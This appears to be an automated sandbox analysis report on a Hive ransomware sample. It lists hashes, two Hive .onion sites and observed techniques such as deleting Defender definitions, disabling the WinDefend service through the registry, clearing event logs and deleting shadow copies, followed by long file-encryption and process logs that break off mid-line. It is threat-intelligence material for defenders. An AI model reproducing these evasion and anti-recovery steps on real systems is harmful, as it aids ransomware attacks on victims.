Analysis
-
max time kernel
126s -
max time network
127s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
12-01-2022 15:00
Static task
static1
Behavioral task
behavioral1
Sample
9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe
Resource
win10-en-20211208
General
-
Target
9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe
-
Size
3.6MB
-
MD5
5f37c1a687d21c5f722e5f08f63bebf2
-
SHA1
921e722e010997e21d8b89cf3fec2953375f0f36
-
SHA256
9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1
-
SHA512
817f908a9503a055ae867664bb7f58056c224a3772c51ea0abf343cf9adaa2b0355b13ebbb185f38d45a91e31b95e9b0ca2774efc84db1fbef394051e351d9b4
Malware Config
Extracted
C:\agQX_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 2084 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exedescription ioc process File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TR00482_.WMF.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Flow.xml.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.felix.gogo.command_0.10.0.v201209301215.jar.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Stationery\GreenBubbles.jpg 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105250.WMF.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309920.WMF.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Swirl\tab_off.gif.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_ja.jar.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\PPKLite.api.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SY01253_.WMF.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImage.jpg.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Volgograd.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CALHM.POC.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\OriginMergeFax.Dotx.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_IAAAACAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01607U.BMP.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\BTOPENWORLD.COM.XML.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FORMCTL.POC.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_IAAAACAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\flower_h.png 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.attributeTransformation.exsd.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.sat4j.pb_2.3.5.v201404071733.jar.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files\Windows Mail\en-US\msoeres.dll.mui 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101865.BMP.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_IAAAACAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\Certificates\groove.net\ManagedObjects\agQX_HOW_TO_DECRYPT.txt 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0198025.WMF.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386267.JPG.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files (x86)\Windows Media Player\fr-FR\WMPDMC.exe.mui 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\agQX_HOW_TO_DECRYPT.txt 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files\Mozilla Firefox\Accessible.tlb.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SLATE\SLATE.INF.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0212299.WMF.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_IAAAACAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0222021.WMF.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_IAAAACAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\de-DE\css\flyout.css 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-crescent.png 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File created C:\Program Files\Java\jre7\lib\deploy\agQX_HOW_TO_DECRYPT.txt 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files\7-Zip\Lang\ps.txt.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\tile16.png 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187851.WMF.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_increaseindent.gif.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_IAAAACAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0103850.WMF.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341653.JPG.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_IAAAACAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\agQX_HOW_TO_DECRYPT.txt 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files\7-Zip\Lang\it.txt.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Bucharest.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_IAAAACAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.xml_1.3.4.v201005080400.jar.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\vlc.mo.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color48.bmp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_settings.png 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jawt.h.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.commands_0.10.2.v20140424-2344.jar.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_IAAAACAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-profiler.xml.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\vlc.mo.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File created C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\agQX_HOW_TO_DECRYPT.txt 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPOlive.png.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_IAAAACAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\WB00760L.GIF.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14757_.GIF.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_IAAAACAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File created C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\agQX_HOW_TO_DECRYPT.txt 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-ui_zh_CN.jar.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Earthy.css.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ZoomIcons.jpg.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_IAAAACAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FS3BOX.POC.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00478_.WMF.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\People\MMHMM.WAV.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1480 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exe9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exepid process 2116 powershell.exe 2192 powershell.exe 1600 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 1788 wevtutil.exe Token: SeBackupPrivilege 1788 wevtutil.exe Token: SeSecurityPrivilege 1796 wevtutil.exe Token: SeBackupPrivilege 1796 wevtutil.exe Token: SeSecurityPrivilege 892 wevtutil.exe Token: SeBackupPrivilege 892 wevtutil.exe Token: SeIncreaseQuotaPrivilege 624 wmic.exe Token: SeSecurityPrivilege 624 wmic.exe Token: SeTakeOwnershipPrivilege 624 wmic.exe Token: SeLoadDriverPrivilege 624 wmic.exe Token: SeSystemProfilePrivilege 624 wmic.exe Token: SeSystemtimePrivilege 624 wmic.exe Token: SeProfSingleProcessPrivilege 624 wmic.exe Token: SeIncBasePriorityPrivilege 624 wmic.exe Token: SeCreatePagefilePrivilege 624 wmic.exe Token: SeBackupPrivilege 624 wmic.exe Token: SeRestorePrivilege 624 wmic.exe Token: SeShutdownPrivilege 624 wmic.exe Token: SeDebugPrivilege 624 wmic.exe Token: SeSystemEnvironmentPrivilege 624 wmic.exe Token: SeRemoteShutdownPrivilege 624 wmic.exe Token: SeUndockPrivilege 624 wmic.exe Token: SeManageVolumePrivilege 624 wmic.exe Token: 33 624 wmic.exe Token: 34 624 wmic.exe Token: 35 624 wmic.exe Token: SeIncreaseQuotaPrivilege 920 wmic.exe Token: SeSecurityPrivilege 920 wmic.exe Token: SeTakeOwnershipPrivilege 920 wmic.exe Token: SeLoadDriverPrivilege 920 wmic.exe Token: SeSystemProfilePrivilege 920 wmic.exe Token: SeSystemtimePrivilege 920 wmic.exe Token: SeProfSingleProcessPrivilege 920 wmic.exe Token: SeIncBasePriorityPrivilege 920 wmic.exe Token: SeCreatePagefilePrivilege 920 wmic.exe Token: SeBackupPrivilege 920 wmic.exe Token: SeRestorePrivilege 920 wmic.exe Token: SeShutdownPrivilege 920 wmic.exe Token: SeDebugPrivilege 920 wmic.exe Token: SeSystemEnvironmentPrivilege 920 wmic.exe Token: SeRemoteShutdownPrivilege 920 wmic.exe Token: SeUndockPrivilege 920 wmic.exe Token: SeManageVolumePrivilege 920 wmic.exe Token: 33 920 wmic.exe Token: 34 920 wmic.exe Token: 35 920 wmic.exe Token: SeIncreaseQuotaPrivilege 920 wmic.exe Token: SeSecurityPrivilege 920 wmic.exe Token: SeTakeOwnershipPrivilege 920 wmic.exe Token: SeLoadDriverPrivilege 920 wmic.exe Token: SeSystemProfilePrivilege 920 wmic.exe Token: SeSystemtimePrivilege 920 wmic.exe Token: SeProfSingleProcessPrivilege 920 wmic.exe Token: SeIncBasePriorityPrivilege 920 wmic.exe Token: SeCreatePagefilePrivilege 920 wmic.exe Token: SeBackupPrivilege 920 wmic.exe Token: SeRestorePrivilege 920 wmic.exe Token: SeShutdownPrivilege 920 wmic.exe Token: SeDebugPrivilege 920 wmic.exe Token: SeSystemEnvironmentPrivilege 920 wmic.exe Token: SeRemoteShutdownPrivilege 920 wmic.exe Token: SeUndockPrivilege 920 wmic.exe Token: SeManageVolumePrivilege 920 wmic.exe Token: 33 920 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 1600 wrote to memory of 520 1600 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe net.exe PID 1600 wrote to memory of 520 1600 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe net.exe PID 1600 wrote to memory of 520 1600 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe net.exe PID 1600 wrote to memory of 520 1600 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe net.exe PID 520 wrote to memory of 560 520 net.exe net1.exe PID 520 wrote to memory of 560 520 net.exe net1.exe PID 520 wrote to memory of 560 520 net.exe net1.exe PID 520 wrote to memory of 560 520 net.exe net1.exe PID 1600 wrote to memory of 1736 1600 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe net.exe PID 1600 wrote to memory of 1736 1600 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe net.exe PID 1600 wrote to memory of 1736 1600 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe net.exe PID 1600 wrote to memory of 1736 1600 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe net.exe PID 1736 wrote to memory of 1480 1736 net.exe net1.exe PID 1736 wrote to memory of 1480 1736 net.exe net1.exe PID 1736 wrote to memory of 1480 1736 net.exe net1.exe PID 1736 wrote to memory of 1480 1736 net.exe net1.exe PID 1600 wrote to memory of 1344 1600 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe net.exe PID 1600 wrote to memory of 1344 1600 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe net.exe PID 1600 wrote to memory of 1344 1600 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe net.exe PID 1600 wrote to memory of 1344 1600 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe net.exe PID 1344 wrote to memory of 364 1344 net.exe net1.exe PID 1344 wrote to memory of 364 1344 net.exe net1.exe PID 1344 wrote to memory of 364 1344 net.exe net1.exe PID 1344 wrote to memory of 364 1344 net.exe net1.exe PID 1600 wrote to memory of 1188 1600 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe net.exe PID 1600 wrote to memory of 1188 1600 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe net.exe PID 1600 wrote to memory of 1188 1600 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe net.exe PID 1600 wrote to memory of 1188 1600 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe net.exe PID 1188 wrote to memory of 1576 1188 net.exe net1.exe PID 1188 wrote to memory of 1576 1188 net.exe net1.exe PID 1188 wrote to memory of 1576 1188 net.exe net1.exe PID 1188 wrote to memory of 1576 1188 net.exe net1.exe PID 1600 wrote to memory of 1380 1600 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe net.exe PID 1600 wrote to memory of 1380 1600 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe net.exe PID 1600 wrote to memory of 1380 1600 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe net.exe PID 1600 wrote to memory of 1380 1600 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe net.exe PID 1380 wrote to memory of 624 1380 net.exe net1.exe PID 1380 wrote to memory of 624 1380 net.exe net1.exe PID 1380 wrote to memory of 624 1380 net.exe net1.exe PID 1380 wrote to 